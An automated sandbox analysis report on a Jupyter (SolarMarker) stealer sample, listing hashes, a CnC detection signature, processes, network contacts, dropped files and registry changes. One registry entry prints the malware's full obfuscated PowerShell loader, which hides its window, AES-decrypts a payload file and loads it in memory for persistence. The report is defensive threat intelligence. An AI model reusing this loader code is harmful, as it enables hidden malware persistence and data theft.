Malware Analysis Report

2024-10-24 18:08

Sample ID 220613-abeldsgfe4
Target 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.7z
SHA256 6828ce39fa7de6c4efabe1c7b6d19213c56d094c12731ff035bd114408e52263
Tags
jupyter backdoor stealer suricata trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6828ce39fa7de6c4efabe1c7b6d19213c56d094c12731ff035bd114408e52263

Threat Level: Known bad

The file 1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.7z was found to be: Known bad.

Malicious Activity Summary

jupyter backdoor stealer suricata trojan

suricata: ET MALWARE Jupyter Stealer CnC Checkin

Jupyter, SolarMarker

Jupyter family

Blocklisted process makes network request

Drops startup file

Program crash

Modifies registry class

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2022-06-13 00:03

Signatures

Jupyter family

jupyter

Analysis: behavioral1

Detonation Overview

Submitted

2022-06-13 00:01

Reported

2022-06-13 00:09

Platform

win10-20220414-en

Max time kernel

307s

Max time network

311s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe"

Signatures

Jupyter, SolarMarker

backdoor trojan stealer jupyter

suricata: ET MALWARE Jupyter Stealer CnC Checkin

suricata

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AAkseLakVWShCAFBIqeAz.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\.rhycuoqczmgclvgvil\ = "jplfkwrqxarlkfumjaublhevlrnzqaj" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3297182285-798020602-2032295036-1000_Classes\jplfkwrqxarlkfumjaublhevlrnzqaj\shell\open\command\ = "powershell -command \"$showWindowAsync=Add-Type -MemberDefinition ('['+'D'.ToUpper()+'ll'.ToLower()+'I'.ToUpper()+'mport('.ToLower()+[char]0x22+'user32.dll'.ToLower()+[char]0x22+')]public static extern bool '.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync('.ToLower()+'I'.ToUpper()+'nt'.ToLower()+'P'.ToUpper()+'tr hWnd, int nCmdShow);'.ToLower()) -Name ('W'.ToUpper()+'in32'.ToLower()+'S'.ToUpper()+'how'.ToLower()+'W'.ToUpper()+'indow'.ToLower()+'A'.ToUpper()+'sync'.ToLower()) -Namespace Win32Functions -PassThru;$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0);$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SuzlSBEybt+4l4GorDHHnbdEjW5soZLDzFJs4SVeMJ0=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\AppData\\Local\\Temp\\SuMZpQaKehWXVEkKQuHyLIZz\\ybWylzucNKVPS.rhyCuOqCZmgcLvgvIl'));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[F26y7_MVUpgqQtmoaaDj.RJt6RD8GBp9hWlC5Gbu11nR9257QVV1qfUfdMGc0QJhbcaHbl95wlIt0RvEZQXgar4zx]::UupaQTjrkgVL7jhlnNjwwOfoiDFmEk6eD5fN96jMuScriboS9_bVDY8MwON3Lmr_VqfUsde9ih0S5aB1amydC9k();\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe

"C:\Users\Admin\AppData\Local\Temp\1d4ab34baa9e5c2cc73ec2788ca8d849befe8c0ef5d8fdd5b7a4bed5de6ebaff.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.cmdline"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD12.tmp" "c:\Users\Admin\AppData\Local\Temp\ep0525dx\CSC170DC3D0F86249CCA0BE8FEC46F733E.TMP"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 3728 -s 936

Network

Country Destination Domain Proto
US 20.42.65.90:443 tcp
RO 37.120.247.120:80 37.120.247.120 tcp

Files

memory/3728-117-0x00000000005D0000-0x00000000015D0000-memory.dmp

memory/1016-118-0x0000000000000000-mapping.dmp

memory/1016-123-0x000001594BA40000-0x000001594BA62000-memory.dmp

memory/1016-142-0x0000015964600000-0x000001596463C000-memory.dmp

memory/1016-153-0x00000159646C0000-0x0000015964736000-memory.dmp

memory/3776-230-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.cmdline

MD5 99bcd1c19fb29827fb47c00f2f10c264
SHA1 93d6c983b6938564a00519eab58da5fa72dc13f4
SHA256 8e23f2c03d3ab8f70e1b9c083bfd749219e2327a67efb3c0edd5f15f10df12e9
SHA512 afdf1f6c0c711d6dcabb35e00c579e83a696fa25c538e07342ba3fb2deb84680e80e1f43ace3f6b6ed1b38694ed85040777c36a673fc1d22c9762fe0a45867cf

\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.0.cs

MD5 2f9b4948ac0b26204994e246094a9f5d
SHA1 9870e53ad61eba593a2074d2a30202f7e3df09f7
SHA256 def6ec20884e30f8689cb1ccb8fb62735db528c5277f52f64ecae170cfd49776
SHA512 ef5f9056b36c8f9204a65b26244f225a9c2cc3bf5b1c46055e6eda06e63769243538b568b29627eb497289777fa69468e64b5eae0fb666bbb2e432a3059154d1

memory/160-233-0x0000000000000000-mapping.dmp

\??\c:\Users\Admin\AppData\Local\Temp\ep0525dx\CSC170DC3D0F86249CCA0BE8FEC46F733E.TMP

MD5 f75144a068d98ca775e45b05a7609d9f
SHA1 5af5a7eb16553a66f6013362b439b52be4a80b5a
SHA256 0399de1e3b7746572693e6f2161e8a31e14608b29304240cf0b967b94b3b45de
SHA512 9562092f6ee4185d154192424d63bc2a5675f458ce48dd3042075aa85a1af1ea6ab0397a0720ccbeb49516029ec07b7e5d0b0d02ed434fe0dc63928f52f25bda

C:\Users\Admin\AppData\Local\Temp\RESFD12.tmp

MD5 0b2c9f1a68309a879e2fa3eb0ed42191
SHA1 f108a9b65bd91d95551f1bbd5cde2d2596364a05
SHA256 6cf0e222a3be64aa34fe63baffa1ffba4e0818d2e74a83f74f9d4c7d8030ace3
SHA512 69bcb1327f20abf5b8f198fb84a8e9627953e1f2ad95e2ea765b503e54f4630557f14fc851a5b9d65d163e0db91b4770165025a780e4e850c049b2d584c27b45

C:\Users\Admin\AppData\Local\Temp\ep0525dx\ep0525dx.dll

MD5 33d01500a8b7aae1f1f9bf7bb0a84ff1
SHA1 5ba1575702f2540b0bbf45355ce1c58baf8d2199
SHA256 b3f5bd1696f11e4409f0c8686b3ef5c66fe58008b9267052cec1563329c29db1
SHA512 3f475092c3aa0e776a6532eae919a4205347670bff95d73e5c6960d32009a35e885fb719531ae973c443b200b704608102a0c65f6a372f7e10d9430089ebbca4

memory/1016-237-0x00000159642A0000-0x00000159642A8000-memory.dmp

memory/3984-326-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

MD5 2143b379fed61ab5450bab1a751798ce
SHA1 32f5b4e8d1387688ee5dec6b3cc6fd27b454f19e
SHA256 a2c739624812ada0913f2fbfe13228e7e42a20efdcb6d5c4e111964f9b620f81
SHA512 0bc39e3b666fdad76bcf4fe7e7729c9e8441aa2808173efc8030ce07c753cb5f7e25d81dd8ec75e7a5b6324b7504ff461e470023551976a2a6a415d6a4859bfa

memory/1016-376-0x0000015964740000-0x00000159647EC000-memory.dmp